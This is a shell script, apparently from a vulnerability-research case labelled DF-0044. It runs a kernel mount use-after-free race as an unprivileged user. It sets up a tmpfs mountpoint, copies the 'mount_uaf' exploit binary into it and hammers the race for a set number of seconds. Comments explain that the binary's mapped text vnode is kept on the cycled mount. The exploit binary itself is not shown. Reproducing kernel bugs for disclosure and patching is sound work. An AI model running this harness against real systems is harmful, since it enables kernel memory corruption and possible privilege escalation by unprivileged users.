DF-0044 / run.sh
#!/bin/sh # DF-0044 run -- set up the cycled mount, host the binary inside it, # and hammer the race as the unprivileged user. # # Pre-conditions on the guest (run as root once before this script): # sysctl vfs.usermount=1 # mkdir -p /tmp/df0044/m # chown <user>:<user> /tmp/df0044/m # chmod 0755 /tmp/df0044/m # # Then as the unprivileged user: # ./build.sh && ./run.sh [SECS] set -e cd "$(dirname "$0")" SECS="${1:-60}" BASE=/tmp/df0044 MP=$BASE/m mkdir -p "$MP" chmod 0755 "$MP" 2>/dev/null || true # Initial tmpfs to host the binary. The cycler will overmount+unmount this # path; the binary's text vp stays mapped on this initial mount, and # /proc/self/map walks its path across the cycled mountpoint. mount -t tmpfs dummy "$MP" 2>/dev/null || true chmod 0755 "$MP" cp -f mount_uaf "$MP/mount_uaf" chmod 755 "$MP/mount_uaf" cd "$MP" echo "DF-0044: starting race for ${SECS}s ..." ./mount_uaf "$MP" "$SECS" 2 RC=$? echo "DF-0044: rc=$RC" exit $RC |